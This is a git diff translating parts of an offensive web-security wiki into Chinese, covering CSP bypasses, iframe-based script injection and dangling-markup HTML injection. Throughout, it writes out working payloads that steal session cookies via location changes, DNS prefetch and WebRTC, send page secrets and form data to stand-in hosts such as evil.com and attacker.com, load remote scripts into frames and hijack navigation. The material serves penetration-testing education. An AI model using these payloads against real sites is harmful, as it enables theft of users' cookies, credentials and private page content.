 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
 **Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+参与深入探讨黑客的刺激与挑战的内容
 
 **Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+通过实时新闻和见解，跟上快速变化的黑客世界
 
 **Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+及时了解最新的漏洞赏金发布和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并立即与顶级黑客合作！
 
 ## Unsafe Technologies to Bypass CSP
 
 ### PHP Errors when too many params
 
-According to the [**last technique commented in this video**](https://www.youtube.com/watch?v=Sm4G6cAHjWM), sending too many parameters (1001 GET parameters although you can also do it with POST params and more that 20 files). Any defined **`header()`** in the PHP web code **won't be sent** because of the error that this will trigger.
+根据 [**this video**](https://www.youtube.com/watch?v=Sm4G6cAHjWM) 中评论的**最后一种技术**，发送过多参数（1001个GET参数，尽管你也可以使用POST参数和超过20个文件）。任何在PHP网页代码中定义的 **`header()`** 都**不会被发送**，因为这将触发错误。
 
 ### PHP response buffer overload
 
-PHP is known for **buffering the response to 4096** bytes by default. Therefore, if PHP is showing a warning, by providing **enough data inside warnings**, the **response** will be **sent** **before** the **CSP header**, causing the header to be ignored.\
-Then, the technique consists basically in **filling the response buffer with warnings** so the CSP header isn't sent.
+PHP以默认方式**缓冲响应到4096**字节。因此，如果PHP显示警告，通过提供**足够的数据在警告中**，**响应**将**在** **CSP头**之前**发送**，导致头被忽略。\
+然后，这种技术基本上是**用警告填充响应缓冲区**，以便CSP头不被发送。
 
 Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
 
 ### Rewrite Error Page
 
-From [**this writeup**](https://blog.ssrf.kr/69) it looks like it was possible to bypass a CSP protection by loading an error page (potentially without CSP) and rewriting its content.
-
+根据 [**this writeup**](https://blog.ssrf.kr/69)，似乎可以通过加载一个错误页面（可能没有CSP）并重写其内容来绕过CSP保护。
 ```javascript
 a = window.open("/" + "x".repeat(4100))
 setTimeout(function () {
-  a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`
+a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`
 }, 1000)
 ```
-
 ### SOME + 'self' + wordpress
 
-SOME is a technique that abuses an XSS (or highly limited XSS) **in an endpoint of a page** to **abuse** **other endpoints of the same origin.** This is done by loading the vulnerable endpoint from an attacker page and then refreshing the attacker page to the real endpoint in the same origin you want to abuse. This way the **vulnerable endpoint** can use the **`opener`** object in the **payload** to **access the DOM** of the **real endpoint to abuse**. For more information check:
+SOME是一种利用XSS（或高度限制的XSS）**在页面的一个端点**中**滥用** **同一来源的其他端点**的技术。这是通过从攻击者页面加载易受攻击的端点，然后将攻击者页面刷新到您想要滥用的同一来源的真实端点来实现的。这样，**易受攻击的端点**可以在**有效载荷**中使用**`opener`**对象来**访问** **真实端点的DOM**。有关更多信息，请查看：
 
 {{#ref}}
 ../xss-cross-site-scripting/some-same-origin-method-execution.md
 {{#endref}}
 
-Moreover, **wordpress** has a **JSONP** endpoint in `/wp-json/wp/v2/users/1?_jsonp=data` that will **reflect** the **data** sent in the output (with the limitation of only letter, numbers and dots).
+此外，**wordpress**在`/wp-json/wp/v2/users/1?_jsonp=data`中有一个**JSONP**端点，该端点将**反射**输出中发送的**数据**（仅限字母、数字和点的限制）。
 
-An attacker can abuse that endpoint to **generate a SOME attack** against WordPress and **embed** it inside `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` note that this **script** will be **loaded** because it's **allowed by 'self'**. Moreover, and because WordPress is installed, an attacker might abuse the **SOME attack** through the **vulnerable** **callback** endpoint that **bypasses the CSP** to give more privileges to a user, install a new plugin...\
-For more information about how to perform this attack check [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
+攻击者可以利用该端点**生成针对WordPress的SOME攻击**并将其嵌入到`<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>`中，请注意这个**脚本**将被**加载**，因为它是**被'self'允许的**。此外，由于安装了WordPress，攻击者可能会通过**易受攻击的** **回调**端点滥用**SOME攻击**，该端点**绕过CSP**以给予用户更多权限，安装新插件...\
+有关如何执行此攻击的更多信息，请查看[https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
 
 ## CSP Exfiltration Bypasses
 
-If there is a strict CSP that doesn't allow you to **interact with external servers**, there are some things you can always do to exfiltrate the information.
+如果存在严格的CSP，不允许您**与外部服务器交互**，您始终可以做一些事情来提取信息。
 
 ### Location
 
-You could just update the location to send to the attacker's server the secret information:
-
+您可以仅更新位置以将秘密信息发送到攻击者的服务器：
 ```javascript
 var sessionid = document.cookie.split("=")[1] + "."
 document.location = "https://attacker.com/?" + sessionid
 ```
-
 ### Meta tag
 
-You could redirect by injecting a meta tag (this is just a redirect, this won't leak content)
-
+您可以通过注入 meta 标签进行重定向（这只是重定向，不会泄露内容）
 ```html
 <meta http-equiv="refresh" content="1; http://attacker.com" />
 ```
-
 ### DNS Prefetch
 
-To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.\
-You can indicate a browser to pre-resolve a hostname with: `<link rel="dns-prefetch" href="something.com">`
-
-You could abuse this behaviour to **exfiltrate sensitive information via DNS requests**:
+为了更快地加载页面，浏览器将预先解析主机名为IP地址并将其缓存以供后续使用。\
+您可以通过以下方式指示浏览器预解析主机名：`<link rel="dns-prefetch" href="something.com">`
 
+您可以利用这种行为来**通过DNS请求外泄敏感信息**：
 ```javascript
 var sessionid = document.cookie.split("=")[1] + "."
 var body = document.getElementsByTagName("body")[0]
 body.innerHTML =
-  body.innerHTML +
-  '<link rel="dns-prefetch" href="//' +
-  sessionid +
-  'attacker.ch">'
+body.innerHTML +
+'<link rel="dns-prefetch" href="//' +
+sessionid +
+'attacker.ch">'
 ```
-
-Another way:
-
+另一种方法：
 ```javascript
 const linkEl = document.createElement("link")
 linkEl.rel = "prefetch"
 linkEl.href = urlWithYourPreciousData
 document.head.appendChild(linkEl)
 ```
-
-In order to avoid this from happening the server can send the HTTP header:
-
+为了避免这种情况，服务器可以发送 HTTP 头：
 ```
 X-DNS-Prefetch-Control: off
 ```
-
 > [!NOTE]
-> Apparently, this technique doesn't work in headless browsers (bots)
+> 显然，这种技术在无头浏览器（机器人）中不起作用
 
 ### WebRTC
 
-On several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
-
-Actually you can _leak_ informations using a _DNS request_. Check out this code:
+在几个页面上你可以看到 **WebRTC 不检查 CSP 的 `connect-src` 策略**。
 
+实际上，你可以通过 _DNS 请求_ _泄露_ 信息。查看这段代码：
 ```javascript
 ;(async () => {
-  p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
-  p.createDataChannel("")
-  p.setLocalDescription(await p.createOffer())
+p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] })
+p.createDataChannel("")
+p.setLocalDescription(await p.createOffer())
 })()
 ```
-
-Another option:
-
+另一个选项：
 ```javascript
 var pc = new RTCPeerConnection({
-  "iceServers":[
-      {"urls":[
-        "turn:74.125.140.127:19305?transport=udp"
-       ],"username":"_all_your_data_belongs_to_us",
-      "credential":"."
-    }]
+"iceServers":[
+{"urls":[
+"turn:74.125.140.127:19305?transport=udp"
+],"username":"_all_your_data_belongs_to_us",
+"credential":"."
+}]
 });
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```
-
-## Checking CSP Policies Online
+## 在线检查 CSP 策略
 
 - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
 - [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
 
-## Automatically creating CSP
+## 自动创建 CSP
 
 [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
 
-## References
+## 参考文献
 
 - [https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/](https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/)
 - [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
@@ -847,18 +753,17 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 
 <figure><img src="../../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客见解**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金计划和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶级黑客合作吧！
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
index d7676b27a..bae295858 100644
--- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md
@@ -1,19 +1,14 @@
-{{#include ../../banners/hacktricks-training.md}}
-
 A configuration such as:
-
 ```
 Content-Security-Policy: default-src 'self' 'unsafe-inline';
 ```
+禁止使用任何作为字符串传输的代码执行函数。例如：`eval, setTimeout, setInterval` 将因设置 `unsafe-eval` 而被阻止。
 
-Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval`
+来自外部来源的任何内容也会被阻止，包括图像、CSS、WebSockets，尤其是 JS。
 
-Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS
-
-### Via Text & Images
-
-It's observed that modern browsers convert images and texts into HTML to enhance their display (e.g., setting backgrounds, centering, etc.). Consequently, if an image or text file, such as `favicon.ico` or `robots.txt`, is opened via an `iframe`, it's rendered as HTML. Notably, these pages often lack CSP headers and may not include X-Frame-Options, enabling the execution of arbitrary JavaScript from them:
+### 通过文本和图像
 
+观察到现代浏览器将图像和文本转换为 HTML 以增强其显示效果（例如，设置背景、居中等）。因此，如果通过 `iframe` 打开图像或文本文件，例如 `favicon.ico` 或 `robots.txt`，它将作为 HTML 渲染。值得注意的是，这些页面通常缺少 CSP 头，并且可能不包含 X-Frame-Options，从而允许从中执行任意 JavaScript：
 ```javascript
 frame = document.createElement("iframe")
 frame.src = "/css/bootstrap.min.css"
@@ -22,11 +17,9 @@ script = document.createElement("script")
 script.src = "//example.com/csp.js"
 window.frames[0].document.head.appendChild(script)
 ```
+### 通过错误
 
-### Via Errors
-
-Similarly, error responses, like text files or images, typically come without CSP headers and might omit X-Frame-Options. Errors can be induced to load within an iframe, allowing for the following actions:
-
+类似地，错误响应，如文本文件或图像，通常没有CSP头，并且可能省略X-Frame-Options。可以诱导错误在iframe中加载，从而允许以下操作：
 ```javascript
 // Inducing an nginx error
 frame = document.createElement("iframe")
@@ -40,28 +33,24 @@ document.body.appendChild(frame)
 
 // Generating an error via extensive cookies
 for (var i = 0; i < 5; i++) {
-  document.cookie = i + "=" + "a".repeat(4000)
+document.cookie = i + "=" + "a".repeat(4000)
 }
 frame = document.createElement("iframe")
 frame.src = "/"
 document.body.appendChild(frame)
 // Removal of cookies is crucial post-execution
 for (var i = 0; i < 5; i++) {
-  document.cookie = i + "="
+document.cookie = i + "="
 }
 ```
-
-After triggering any of the mentioned scenarios, JavaScript execution within the iframe is achievable as follows:
-
+在触发上述任何场景后，可以通过以下方式在iframe中实现JavaScript执行：
 ```javascript
 script = document.createElement("script")
 script.src = "//example.com/csp.js"
 window.frames[0].document.head.appendChild(script)
 ```
-
-## References
+## 参考
 
 - [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
index 14a4525bc..4de2163ea 100644
--- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
+++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
@@ -4,139 +4,114 @@
 
 ## Resume
 
-This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
-It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
+此技术可用于在发现**HTML注入**时从用户提取信息。如果你**找不到任何利用** [**XSS** ](../xss-cross-site-scripting/)的方法，但可以**注入一些HTML标签**，这非常有用。\
+如果某些**秘密以明文形式保存在HTML中**，并且你想从客户端**提取**它，或者如果你想误导某些脚本执行，这也很有用。
 
-Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
+这里评论的几种技术可以通过以意想不到的方式（html标签、CSS、http-meta标签、表单、base等）提取信息来绕过某些[**内容安全策略**](../content-security-policy-csp-bypass/)。
 
 ## Main Applications
 
 ### Stealing clear text secrets
 
-If you inject `<img src='http://evil.com/log.cgi?` when the page is loaded the victim will send you all the code between the injected `img` tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).
-
-If the `img` tag is forbidden (due to CSP for example) you can also use `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
+如果你在页面加载时注入`<img src='http://evil.com/log.cgi?`，受害者将向你发送所有在注入的`img`标签和代码中的下一个引号之间的代码。如果某个秘密以某种方式位于该块中，你将窃取它（你可以使用双引号做同样的事情，看看哪个更有趣）。
 
+如果`img`标签被禁止（例如由于CSP），你也可以使用`<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
 ```html
 <img src='http://attacker.com/log.php?HTML=
 <meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
 <meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
 ```
+请注意，**Chrome 阻止包含 "<" 或 "\n" 的 HTTP URL**，因此您可以尝试其他协议方案，如 "ftp"。
 
-Note that **Chrome blocks HTTP URLs** with "<" or "\n" in it, so you could try other protocol schemes like "ftp".
-
-You can also abuse CSS `@import` (will send all the code until it find a ";")
-
+您还可以滥用 CSS `@import`（将发送所有代码，直到找到 ";"）
 ```html
 <style>@import//hackvertor.co.uk?     <--- Injected
 <b>steal me!</b>;
 ```
-
-You could also use **`<table`**:
-
+您还可以使用 **`<table`**：
 ```html
 <table background='//your-collaborator-id.burpcollaborator.net?'
 ```
-
-You could also insert a `<base` tag. All the information will be sent until the quote is closed but it requires some user interaction (the user must click in some link, because the base tag will have changed the domain pointed by the link):
-
+您还可以插入一个 `<base` 标签。所有信息将在引号关闭之前发送，但这需要一些用户交互（用户必须点击某个链接，因为基本标签将更改链接指向的域）：
 ```html
 <base target='        <--- Injected
 steal me'<b>test</b>
 ```
-
-### Stealing forms
-
+### 偷取表单
 ```html
 <base href="http://evil.com/" />
 ```
-
-Then, the forms that send data to path (like `<form action='update_profile.php'>`) will send the data to the malicious domain.
+然后，发送数据到路径的表单（如 `<form action='update_profile.php'>`）将把数据发送到恶意域名。
 
 ### Stealing forms 2
 
-Set a form header: `<form action='http://evil.com/log_steal'>` this will overwrite the next form header and all the data from the form will be sent to the attacker.
+设置表单头：`<form action='http://evil.com/log_steal'>` 这将覆盖下一个表单头，所有来自表单的数据将被发送给攻击者。
 
 ### Stealing forms 3
 
-The button can change the URL where the information of the form is going to be sent with the attribute "formaction":
-
+按钮可以通过属性 "formaction" 更改信息将要发送的表单的 URL：
 ```html
 <button name="xss" type="submit" formaction="https://google.com">
-  I get consumed!
+I get consumed!
 </button>
 ```
+攻击者可以利用这一点窃取信息。
 
-An attacker can use this to steal the information.
+在这个[**报告中找到此攻击的示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。
 
-Find an [**example of this attack in this writeup**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp).
-
-### Stealing clear text secrets 2
-
-Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field:
+### 窃取明文秘密 2
 
+使用最新提到的技术窃取表单（注入新的表单头），然后可以注入一个新的输入字段：
 ```html
 <input type='hidden' name='review_body' value="
 ```
+该输入字段将包含其双引号之间的所有内容以及下一个双引号中的内容。这种攻击将“_**窃取明文秘密**_”与“_**窃取表单2**_”混合在一起。
 
-and this input field will contain all the content between its double quote and the next double quote in the HTML. This attack mix the "_**Stealing clear text secrets**_" with "_**Stealing forms2**_".
-
-You can do the same thing injecting a form and an `<option>` tag. All the data until a closed `</option>` is found will be sent:
-
+您可以通过注入一个表单和一个`<option>`标签来做同样的事情。所有数据直到找到一个关闭的`</option>`都会被发送：
 ```html
 <form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
 ```
+### 表单参数注入
 
-### Form parameter injection
-
-You can change the path of a form and insert new values so an unexpected action will be performed:
-
+您可以更改表单的路径并插入新值，以便执行意外的操作：
 ```html
 <form action="/change_settings.php">
-  <input type="hidden" name="invite_user" value="fredmbogo" /> ← Injected lines
+<input type="hidden" name="invite_user" value="fredmbogo" /> ← Injected lines
 
-  <form action="/change_settings.php">
-    ← Existing form (ignored by the parser) ...
-    <input type="text" name="invite_user" value="" /> ← Subverted field ...
-    <input type="hidden" name="xsrf_token" value="12345" />
-    ...
-  </form>
+<form action="/change_settings.php">
+← Existing form (ignored by the parser) ...
+<input type="text" name="invite_user" value="" /> ← Subverted field ...
+<input type="hidden" name="xsrf_token" value="12345" />
+...
+</form>
 </form>
 ```
+### 通过 noscript 偷取明文秘密
 
-### Stealing clear text secrets via noscript
-
-`<noscript></noscript>` Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in [chrome://settings/content/javascript](chrome://settings/content/javascript)).
-
-A way to exfiltrate the content of the web page from the point of injection to the bottom to an attacker controlled site will be injecting this:
+`<noscript></noscript>` 是一个标签，其内容将在浏览器不支持 JavaScript 时被解释（您可以在 [chrome://settings/content/javascript](chrome://settings/content/javascript) 中启用/禁用 JavaScript）。
 
+一种将从注入点到页面底部的网页内容导出到攻击者控制的网站的方法是注入以下内容：
 ```html
 <noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
 ```
+### 通过用户交互绕过CSP
 
-### Bypassing CSP with user interaction
-
-From this [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) you can learn that even from the **most CSP restricted** environments you can still **exfiltrate data** with some **user interaction**. In this occasion we are going to use the payload:
-
+从这个 [portswiggers研究](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) 中你可以了解到，即使在 **最严格的CSP** 环境中，你仍然可以通过一些 **用户交互** 来 **提取数据**。在这种情况下，我们将使用以下有效载荷：
 ```html
 <a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
 <base target='
 ```
-
-Note that you will ask the **victim** to **click on a link** that will **redirect** him to **payload** controlled by you. Also note that the **`target`** attribute inside the **`base`** tag will contain **HTML content** until the next single quote.\
-This will make that the **value** of **`window.name`** if the link is clicked is going to be all that **HTML content**. Therefore, as you **control the page** where the victim is accessing by clicking the link, you can access that **`window.name`** and **exfiltrate** that data:
-
+请注意，您将要求**受害者**点击一个**链接**，该链接将**重定向**他到您控制的**有效载荷**。还要注意，**`base`**标签中的**`target`**属性将包含**HTML内容**，直到下一个单引号。\
+这将使得如果点击链接，**`window.name`**的**值**将是所有的**HTML内容**。因此，由于您**控制**受害者通过点击链接访问的页面，您可以访问该**`window.name`**并**提取**该数据：
 ```html
 <script>
-  if(window.name) {
-      new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
+if(window.name) {
+new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
 </script>
 ```
+### 误导性脚本工作流程 1 - HTML 命名空间攻击
 
-### Misleading script workflow 1 - HTML namespace attack
-
-Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script. In this example you are selecting with whom a information is going to be shared:
-
+在 HTML 中插入一个带有 id 的新标签，该标签将覆盖下一个标签，并且其值将影响脚本的流程。在此示例中，您正在选择与谁共享信息：
 ```html
 <input type="hidden" id="share_with" value="fredmbogo" /> ← Injected markup ...
 Share this status update with: ← Legitimate optional element of a dialog
@@ -145,11 +120,9 @@ Share this status update with: ← Legitimate optional element of a dialog
 ... function submit_status_update() { ... request.share_with =
 document.getElementById('share_with').value; ... }
 ```
+### 误导性脚本工作流 2 - 脚本命名空间攻击
 
-### Misleading script workflow 2 - Script namespace attack
-
-Create variables inside javascript namespace by inserting HTML tags. Then, this variable will affect the flow of the application:
-
+通过插入 HTML 标签在 JavaScript 命名空间内创建变量。然后，这个变量将影响应用程序的流程：
 ```html
 <img id="is_public" /> ← Injected markup ... // Legitimate application code
 follows function retrieve_acls() { ... if (response.access_mode == AM_PUBLIC) ←
@@ -157,85 +130,74 @@ The subsequent assignment fails in IE is_public = true; else is_public = false;
 } function submit_new_acls() { ... if (is_public) request.access_mode =
 AM_PUBLIC; ← Condition always evaluates to true ... }
 ```
-
 ### Abuse of JSONP
 
-If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:
-
+如果你发现一个 JSONP 接口，你可能能够调用一个任意函数并传递任意数据：
 ```html
 <script src='/editor/sharing.js'>:              ← Legitimate script
-  function set_sharing(public) {
-    if (public) request.access_mode = AM_PUBLIC;
-      else request.access_mode = AM_PRIVATE;
-    ...
-  }
+function set_sharing(public) {
+if (public) request.access_mode = AM_PUBLIC;
+else request.access_mode = AM_PRIVATE;
+...
+}
 
 <script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
-  set_sharing({ ... })
+set_sharing({ ... })
 ```
-
-Or you can even try to execute some javascript:
-
+或者你甚至可以尝试执行一些javascript：
 ```html
 <script src="/search?q=a&call=alert(1)"></script>
 ```
+### Iframe 滥用
 
-### Iframe abuse
-
-A child document possesses the capability to view and modify the `location` property of its parent, even in cross-origin situations. This allows the embedding of a script within an **iframe** that can redirect the client to an arbitrary page:
-
+子文档能够查看和修改其父文档的 `location` 属性，即使在跨源情况下。这允许在 **iframe** 中嵌入一个脚本，可以将客户端重定向到任意页面：
 ```html
 <html>
-  <head></head>
-  <body>
-    <script>
-      top.window.location = "https://attacker.com/hacked.html"
-    </script>
-  </body>
+<head></head>
+<body>
+<script>
+top.window.location = "https://attacker.com/hacked.html"
+</script>
+</body>
 </html>
 ```
+这可以通过类似于：`sandbox=' allow-scripts allow-top-navigation'` 来缓解。
 
-This can be mitigated with something like: `sandbox=' allow-scripts allow-top-navigation'`
-
-An iframe can also be abused to leak sensitive information from a different page **using the iframe name attribute**. This is because you can create an iframe that iframes itself abusing the HTML injection that makes the **sensitive info appear inside the iframe name attribute** and then access that name from the initial iframe and leak it.
-
+iframe 也可以被滥用来泄露来自不同页面的敏感信息 **使用 iframe name 属性**。这是因为你可以创建一个 iframe，它自身嵌套 iframe，利用 HTML 注入使 **敏感信息出现在 iframe name 属性中**，然后从初始 iframe 访问该名称并泄露它。
 ```html
 <script>
-  function cspBypass(win) {
-    win[0].location = "about:blank"
-    setTimeout(() => alert(win[0].name), 500)
-  }
+function cspBypass(win) {
+win[0].location = "about:blank"
+setTimeout(() => alert(win[0].name), 500)
+}
 </script>
 
 <iframe
-  src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27"
-  onload="cspBypass(this.contentWindow)"></iframe>
+src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27"
+onload="cspBypass(this.contentWindow)"></iframe>
 ```
+有关更多信息，请查看 [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
 
-For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
+### \<meta 滥用
 
-### \<meta abuse
+您可以使用 **`meta http-equiv`** 执行 **多个操作**，例如设置 Cookie：`<meta http-equiv="Set-Cookie" Content="SESSID=1">` 或执行重定向（在这种情况下为 5 秒）：`<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
 
-You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect (in 5s in this case): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
+这可以通过 **CSP** 来 **避免**，涉及 **http-equiv**（`Content-Security-Policy: default-src 'self';` 或 `Content-Security-Policy: http-equiv 'self';`）
 
-This can be **avoided** with a **CSP** regarding **http-equiv** ( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`)
-
-### New \<portal HTML tag
-
-You can find a very **interesting research** on exploitable vulnerabilities of the \<portal tag [here](https://research.securitum.com/security-analysis-of-portal-element/).\
-At the moment of this writing you need to enable the portal tag on Chrome in `chrome://flags/#enable-portals` or it won't work.
+### 新的 \<portal HTML 标签
 
+您可以在 [这里](https://research.securitum.com/security-analysis-of-portal-element/) 找到关于 \<portal 标签可利用漏洞的 **有趣研究**。\
+在撰写本文时，您需要在 `chrome://flags/#enable-portals` 中启用 portal 标签，否则它将无法工作。
 ```html
 <portal src='https://attacker-server?
 ```
+### HTML 漏洞
 
-### HTML Leaks
-
-Not all the ways to leak connectivity in HTML will be useful for Dangling Markup, but sometimes it could help. Check them here: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
+并非所有在 HTML 中泄露连接的方式都对 Dangling Markup 有用，但有时它可能会有所帮助。请在这里查看它们: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
 
 ## SS-Leaks
 
-This is a **mix** between **dangling markup and XS-Leaks**. From one side the vulnerability allows to **inject HTML** (but not JS) in a page of the **same origin** of the one we will be attacking. On the other side we won't **attack** directly the page where we can inject HTML, but **another page**.
+这是 **dangling markup 和 XS-Leaks** 之间的 **混合**。一方面，漏洞允许在 **同源** 的页面中 **注入 HTML**（但不包括 JS）。另一方面，我们不会直接 **攻击** 可以注入 HTML 的页面，而是 **另一个页面**。
 
 {{#ref}}
 ss-leaks.md
@@ -243,17 +205,17 @@ ss-leaks.md
 
 ## XS-Search/XS-Leaks
 
-XS-Search are oriented to **exfiltrate cross-origin information** abusing **side channel attacks**.Therefore, it's a different technique than Dangling Markup, however, some of the techniques abuse the inclusion of HTML tags (with and without JS execution), like [**CSS Injection**](../xs-search/#css-injection) or [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**
+XS-Search 旨在 **提取跨源信息**，利用 **侧信道攻击**。因此，这是一种不同于 Dangling Markup 的技术，然而，一些技术利用了 HTML 标签的包含（有和没有 JS 执行），如 [**CSS 注入**](../xs-search/#css-injection) 或 [**懒加载图像**](../xs-search/#image-lazy-loading)**。**
 
 {{#ref}}
 ../xs-search/
 {{#endref}}
 
-## Brute-Force Detection List
+## 暴力破解检测列表
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
 
-## References
+## 参考文献
 
 - [https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057](https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057)
 - [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)
@@ -261,4 +223,3 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side
 - [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)
 
 {{#include ../../banners/hacktricks-training.md}}
-
